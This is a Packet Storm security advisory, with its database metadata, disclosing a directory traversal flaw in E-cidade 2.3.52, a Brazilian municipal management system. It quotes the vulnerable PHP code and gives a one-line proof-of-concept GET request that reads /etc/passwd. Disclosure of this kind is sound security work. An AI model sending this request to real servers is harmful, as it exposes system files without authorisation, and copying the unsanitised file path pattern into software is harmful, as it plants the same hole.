ID PACKETSTORM:138514 Type packetstorm Reporter vesp3r Modified 2016-08-26T00:00:00
Description
`E-cidade Directory Traversal
Vendor: DBSeller (www.dbseller.com.br)
Product: E-cidade - Software Publico de Gestao Municipal
Vulnerability discovered by vesp3r - vesp3r7c3@gmail.com
Product Description
--------------------
Intended to computerize the management of Brazilian Municipalities.This includes computerized integration
between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.
The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice
of suppliers and ensuring continuity of the system, once supported by the Ministry of Planning.
Modules:
- HUMAN RESOURCES MANAGEMENT
- GEOPROCESSING
- HEALTH MANAGEMENT EDUCATION MANAGEMENT
- BUSINESS INTELIGENCE
- FINANCIAL MANAGEMENT
- TAX MANAGEMENT
- ASSET MANAGEMENT
Advisory Timeline
-----------------
No vendor response
Vulnerable version:
-------------------
2.3.52 and prior
Vulnerability
-------------
The vulnerability exists within 'mostrarelatorio.php' file of the package:
the 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'.
This variable incorporates a call to the file() function.
/fpdf151/mostrarelatorio.php:
-----------------------------
[Snip...]
if(!file_exists("/tmp/".$arquivo)) {
echo "<script>
alert('Codigo nao Encontrado.');
window.close();
</script>";
exit;
}
[Snip...]
$pdf=new PDF();
$pdf->Open();
$pdf->AliasNbPages();
$pdf->AddPage();
$arq = file("/tmp/".$arquivo);
[Snip...]
Proof of Concept
---------------
GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1
`
{"hash": "7ff11a5ad9592bb46fac91f56f66fc13bc221b8338b78f50fb7a2896cf1e7cde", "sourceHref": "https://packetstormsecurity.com/files/download/138514/ecidade2352-traversal.txt", "title": "E-Cidade 2.3.52 Directory Traversal", "id": "PACKETSTORM:138514", "published": "2016-08-26T00:00:00", "description": "", "modified": "2016-08-26T00:00:00", "sourceData": "`E-cidade Directory Traversal \nVendor: DBSeller (www.dbseller.com.br) \nProduct: E-cidade - Software Publico de Gestao Municipal \nVulnerability discovered by vesp3r - vesp3r7c3@gmail.com \n \n \nProduct Description \n-------------------- \n \nIntended to computerize the management of Brazilian Municipalities.This includes computerized integration \nbetween municipal entities: City Hall, Town Hall, Local Government, Foundations and others. \nThe economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice \nof suppliers and ensuring continuity of the system, once supported by the Ministry of Planning. \n \nModules: \n \n- HUMAN RESOURCES MANAGEMENT \n- GEOPROCESSING \n- HEALTH MANAGEMENT EDUCATION MANAGEMENT \n- BUSINESS INTELIGENCE \n- FINANCIAL MANAGEMENT \n- TAX MANAGEMENT \n- ASSET MANAGEMENT \n \nAdvisory Timeline \n----------------- \n \nNo vendor response \n \n \nVulnerable version: \n------------------- \n \n2.3.52 and prior \n \nVulnerability \n------------- \n \nThe vulnerability exists within 'mostrarelatorio.php' file of the package: \nthe 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'. \nThis variable incorporates a call to the file() function. \n \n/fpdf151/mostrarelatorio.php: \n----------------------------- \n \n[Snip...] \n \n \nif(!file_exists(\"/tmp/\".$arquivo)) { \necho \"<script> \nalert('Codigo nao Encontrado.'); \nwindow.close(); \n</script>\"; \nexit; \n} \n \n[Snip...] \n \n$pdf=new PDF(); \n$pdf->Open(); \n$pdf->AliasNbPages(); \n$pdf->AddPage(); \n$arq = file(\"/tmp/\".$arquivo); \n \n \n[Snip...] \n \n \n \nProof of Concept \n--------------- \n \nGET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1 \n`\n", "reporter": "vesp3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "52954f1093657f3313d1c50e8d309d81"}, {"key": "modified", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bab05830c1048ee58d5530d328e182dd"}, {"key": "sourceData", "hash": "2af33438eae3c72f83d1a369e3b69a27"}, {"key": "sourceHref", "hash": "bfbb569c67a331c49bf11515bafe2e02"}, {"key": "title", "hash": "05d1f357dd70be4cbd7960732a844bc7"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/138514/E-Cidade-2.3.52-Directory-Traversal.html", "lastseen": "2016-11-03T10:16:14", "viewCount": 0, "enchantments": {"vulnersScore": 8.3}}